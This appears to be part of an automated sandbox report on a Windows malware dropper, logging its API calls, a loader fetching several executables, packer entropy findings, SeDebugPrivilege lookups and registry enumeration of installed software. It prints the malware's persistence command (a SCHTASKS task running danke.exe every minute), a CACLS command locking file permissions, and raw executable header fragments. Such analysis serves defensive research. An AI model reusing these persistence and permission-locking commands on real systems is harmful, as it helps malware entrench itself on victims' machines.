ShellExecuteExW July 18, 2023, 7:16 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW July 18, 2023, 7:16 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW July 18, 2023, 7:16 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000030051\foto135.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000030051\foto135.exe	1	1
ShellExecuteExW July 18, 2023, 7:16 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000031051\fotod25.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000031051\fotod25.exe	1	1
ShellExecuteExW July 18, 2023, 7:16 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000032051\an.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000032051\an.exe	1	1
ShellExecuteExW July 18, 2023, 7:17 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 18, 2023, 7:17 a.m.	process_identifier: 2376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 28672 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00740000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process danke.exe (4 events)

Time & API	Arguments	Status	Return
InternetReadFile July 18, 2023, 7:16 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà d®`j@ `ÿP@Á ¢´ÀàPT@ .textcd `.dataHh@À.idataR j@@.rsrcÀ\|@@.relocP @B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä .rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile July 18, 2023, 7:16 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà d²`j@ pæî@Á ¢´Àl`T@ .textcd `.dataHh@À.idataR j@@.rsrc À\|@@.reloc` @B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä .rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile July 18, 2023, 7:16 a.m.	buffer: MZÿÿ¸@Øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞA=o/no/no/ncOno/nc no/ngrno/no.nSo/no/no/ncpnÆo/ncuno/nRicho/nPEL^{_dà ð0@0\|ú´.textüãð `.rdata @@.data´@À request_handle: 0x00cc000c	1	1
InternetReadFile July 18, 2023, 7:17 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPELê¦dà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00059200', u'virtual_address': u'0x0000c000', u'entropy': 7.8069766669410505, u'name': u'.rsrc', u'virtual_size': u'0x0005a000'}

entropy

7.80697666694

description

A section with a high entropy has been found

entropy

0.916452442159

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 18, 2023, 7:16 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 18, 2023, 7:16 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 18, 2023, 7:16 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 18, 2023, 7:16 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000003d4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: AddressBook base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: Connection Manager base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: DirectDrawEx base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: EditPlus base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: ENTERPRISE base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: Fontcore base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: Google Chrome base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: IE40 base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: IE4Data base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: IE5BAKEX base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: IEData base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: MobileOptionPack base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: SchedulingAgent base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: WIC base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW July 18, 2023, 7:16 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000003d4 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
